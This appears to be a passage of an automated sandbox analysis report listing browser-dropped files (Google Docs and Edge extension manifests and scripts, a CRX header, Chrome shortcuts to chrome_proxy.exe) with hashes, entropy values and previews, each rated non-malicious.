                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):98880
                                                                                                                                                                                                                                                        Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                        MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                        SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                        SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                        SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):107677
                                                                                                                                                                                                                                                        Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                        MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                        SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                        SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                        SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 22:49:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                        Entropy (8bit):3.9712114700676446
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:8YdYTcXwsHLidAKZdA19ehwiZUklqehvy+3:8DvQ8y
                                                                                                                                                                                                                                                        MD5:02F05B72FD7F137ED314DC3A12BF07CE
                                                                                                                                                                                                                                                        SHA1:3F27B00DAAF636D7EAA6CEA38DF22545A6F91A82
                                                                                                                                                                                                                                                        SHA-256:CE6C0103187CFDB3FACEE153A70B77142813D0FDE16BABAFF1E5F26B818BFCDC
                                                                                                                                                                                                                                                        SHA-512:05EB9F2172D8121B9732D94CD18B6F00BB8AEB82BB4111A6C61A11853FF8B0B559556275E3DAD5FB440EC409529B65EAA94864B85573D45BFFC9E66D51DA162C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....h..;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY(.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY(.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY(.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY(............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........;.% .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 22:49:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                                        Entropy (8bit):3.987560625289885
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:8+dYTcXwsHLidAKZdA1weh/iZUkAQkqehsy+2:8tvq9Qdy
                                                                                                                                                                                                                                                        MD5:D64BFC661E5702F1A29EEED0DCE731AF
                                                                                                                                                                                                                                                        SHA1:B75CF11115B9A461389F2626D834BB5D4A75C063
                                                                                                                                                                                                                                                        SHA-256:1458A45202F40C6C0B42584630FA76EEBF17A9650E484437AFB68D23CD6B3B38
                                                                                                                                                                                                                                                        SHA-512:563611A6FE09D83B8E61548E37C6629F54C16C6126B9600BAD71F3EB00DF89048EA1A03B96A86DBEF91E5688B9195AA22047426D94C9A992E6E9BA1053C55282
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....5#..;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY(.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY(.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY(.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY(............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........;.% .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                                        Entropy (8bit):3.998592983168317
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:8xJdYTcXwsHLidAKZdA14tseh7sFiZUkmgqeh7sCy+BX:8xUvyn4y
                                                                                                                                                                                                                                                        MD5:85C010FE773A2B2D614775EBD9806BFC
                                                                                                                                                                                                                                                        SHA1:6B5E6708CF75009FA1903693CC0B6E40D84DB2CC
                                                                                                                                                                                                                                                        SHA-256:F10C2E8190F3DD57A8CC84E65C0956E8D0F7EA06F9FF3C0135A21844BB86FBAB
                                                                                                                                                                                                                                                        SHA-512:80B3819970CDA683FC33F9761BF49899ACA842FCD914C4D36A210EDC9C89DC62CD1575D973981512EECF10ACEB2F655412D55CDB57E3B4EEBA1462D9E4DDA835
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY(.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY(.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY(.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY(............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........;.% .....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 22:49:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                        Entropy (8bit):3.984807052036377
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:8oYdYTcXwsHLidAKZdA1vehDiZUkwqehQy+R:80vx6y
                                                                                                                                                                                                                                                        MD5:BFF89C88DDB9ABB1739BBA15D556DA69
                                                                                                                                                                                                                                                        SHA1:7905EED16E6EAAA8CA5CBF187AEA1C41E7D1EC46
                                                                                                                                                                                                                                                        SHA-256:4DF330B917EFD8A112E322E25E2E6DBA076168A914153AD59D4766DCA9B80EF8
                                                                                                                                                                                                                                                        SHA-512:2F5A1BCFFC2A1AE5738C0E691FB1250F6B3E3DF60F28FDA10F8CBB0312E14B0E4D2D525C3ADCF6E84707425FD035A24461B292BF9D5CB5C86E0885DE75D00BE9
                                                                                                                                                                                                                                                        Malicious:false
